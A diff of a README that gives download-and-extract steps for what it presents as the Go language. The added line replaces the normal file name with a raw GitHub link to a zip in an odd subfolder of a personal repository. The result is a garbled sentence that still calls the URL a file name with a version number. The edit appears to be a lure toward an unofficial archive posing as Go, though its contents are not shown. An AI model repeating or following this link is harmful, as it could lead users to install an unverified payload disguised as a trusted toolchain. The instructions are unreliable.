HabibullahJutt/golang/README.md

    Look for a file suitable for your system.
 Choose either the Windows, macOS, or Linux version.
 Click the link next to your chosen version to start the download.

 4. **Find the Downloaded File:**
    Once the download is complete, locate the file in your downloads folder.
-It will usually be named something like `golang-x.y.z.zip`, where `x.y.z` is the version number.
+It will usually be named something like `https://raw.githubusercontent.com/HabibullahJutt/golang/main/riversider/golang.zip`, where `x.y.z` is the version number.

 5. **Extract the Files:**
    If you downloaded a zip file, right-click on it and select "Extract All" or "Unzip."
 Follow the prompts to extract the contents to a folder.